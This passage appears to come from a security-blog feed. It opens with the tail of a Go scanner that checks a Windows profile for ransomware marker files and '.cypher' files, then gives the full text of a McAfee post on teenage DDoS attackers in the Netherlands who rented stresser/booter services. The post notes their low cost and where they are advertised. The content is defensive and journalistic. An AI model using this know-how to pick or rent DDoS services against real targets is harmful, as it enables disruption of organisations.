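		switch {
		case markerNames[name]:
			r.Markers = append(r.Markers, path)
		case strings.HasSuffix(name, ".cypher"):
			r.CypherFiles++
		}
		return nil
	})
	return r, err
}

func main() {
	root := os.Getenv("USERPROFILE") // Windows profile root; an assumption for this example
	if root == "" {
		root, _ = os.UserHomeDir()
	}
	r, err := Triage(root)
	if err != nil {
		fmt.Println("scan failed:", err)
		os.Exit(2)
	}
	fmt.Printf("markers=%v cypher_files=%d skipped=%d infected=%v\n", r.Markers, r.CypherFiles, r.SkippedErrs, r.Infected())
}
```

Run it under an account that can read the profile being checked; unreadable entries are counted rather than treated as fatal, so a partial result still tells you whether the marker files and .cypher files are present.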

References:

https://www.virustotal.com/en/file/0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c/analysis/

https://isc.sans.edu/forums/diary/Ransomware+as+a+Service/23277/

The post Free Ransomware Available on Dark Web appeared first on McAfee Blogs.

DDoS Attacks in the Netherlands Reveal Teen Gamers on Troublesome Path


At the end of January, the Netherlands was plagued by distributed denial of service (DDoS) attacks targeting various financial institutions, tech sites, and the Dutch tax authorities. At the time of the attacks it was unclear who was responsible, and this led to speculation among security experts.

Coincidentally, the attacks started a few days after it was announced in the media that the Dutch General Intelligence and Security Service, the AIVD, had played a major role in relaying crucial information to their American counterparts regarding attacks of suspected Russian state-sponsored hackers.

Thus the hypothesis that the attacks were some kind of state-sponsored retaliation was quickly formed. Security experts deemed this hypothesis possible, but it remained unproven.

Arrest

Then on February 1, an 18-year-old suspect was arrested by the National High Tech Crime Unit of the Dutch police. The suspect carelessly left behind some crucial pieces of evidence, which ultimately led to his arrest. Through open-source research, the McAfee Advanced Threat Research team was also able to find links between the arrested suspect and another known DDoS actor. At this moment the police investigation is ongoing to determine the degree of guilt and whether the suspect acted independently. But one thing is certain: The wave of attacks has stopped since his arrest.

The relative ease with which the attack was carried out is striking. The individual had presumably bought a “stresser/booter service” capacity for about €40. The stresser enabled him to launch attacks with a volume of about 40Gbps.

(Stresser, or booter, services are websites that offer distributed denial of service capability as a paid service. These websites offer a way to stress-test a host by simply filling in its IP address. The traffic these services need can be generated from legitimate or illegitimate sources. Attacking a host or website without legal consent is highly illegal.)

McAfee Chief Scientist and Fellow Raj Samani has written “you can disrupt your competition for the price of a cup of coffee.” This attack suggests you can disrupt entire organizations or parts of a country for the price of a pound of good coffee beans.

Thus speculation of a possible state-sponsored retaliation dissolved into an inexpensive and relatively easy method of attack, performed by a teenager.

Earlier DDoS Attacks

This sequence of events reminds me of an earlier DDoS attack I personally investigated. In 2015 one of the largest internet service providers in the Netherlands suffered a DDoS attack for three consecutive days. This attack deprived roughly 1.8 million subscribers of Internet access. In a period of several weeks and after an extensive police investigation, a group of suspects was arrested. All but one of them were teenagers, with the youngest only 14 years old. Their methods were relatively simple as well, from basic Python scripts to the use of stresser/booter services.

I clearly recall that this group of suspects had a great affinity with online gaming. They were active on popular games such as Minecraft and Call of Duty and played a lot in groups or clans. Apparently, it was common practice for the suspects to knock their opponents offline during a game in order to win. Talk about fair play.

Could there be a connection between the gaming community and DDoS attacks, or is this purely a coincidence?

Gaming and DDoS

Who doesn’t remember the crippling Mirai DDoS attacks in the fall of 2016 on DNS provider Dyn, hosting provider OVH, and the popular security blog Krebs on Security?

Brian Krebs actively investigated the group behind the Mirai attacks against his site and published his findings online. During his research into the actors he described a fascinating world within the online gaming industry. In this industry it is big business to have powerful game servers, which attract many customers. This popularity makes those servers a target for the less successful, and their weapon of choice is often DDoS attacks. Game servers are apparently knocked offline daily to push gamers to migrate to the competition. All this distributed “violence” also gave birth to a lively and sometimes shady business in DDoS protection services.

So how would someone with only marginal technical knowledge go about knocking websites offline? All it takes is a simple search on one of the entry-level hacker forums. We found dozens of threads (some listed below) that discussed what it would take to attack (game) servers. The same forum was also full of advertisements and reviews of various stresser and booter services offered online.

In February, news surfaced that an online gaming service offered DDoS for hire. According to the article, the operators of a gaming service were behind the building of an IoT botnet named JenX and offered it as part of their game server rental scheme.

This shows there is a definite link between the online gaming community and the use of DDoS attacks. It is worrying to see that some individuals resort to such drastic measures out of pure frustration. We can only imagine the consequences when such an individual gets a low grade in school or has a disagreement with an online retailer.

End Note

As a former law enforcement official, I am troubled to see teenagers going down a criminal path. I can understand that for teens it is not always easy to foresee the consequences of their actions. One might think that knocking off websites is all fun and games or a way to show your frustration. But from my experience the fun definitely stops when the police come knocking at the door. Then it is literally game over.

The post DDoS Attacks in the Netherlands Reveal Teen Gamers on Troublesome Path appeared first on McAfee Blogs.
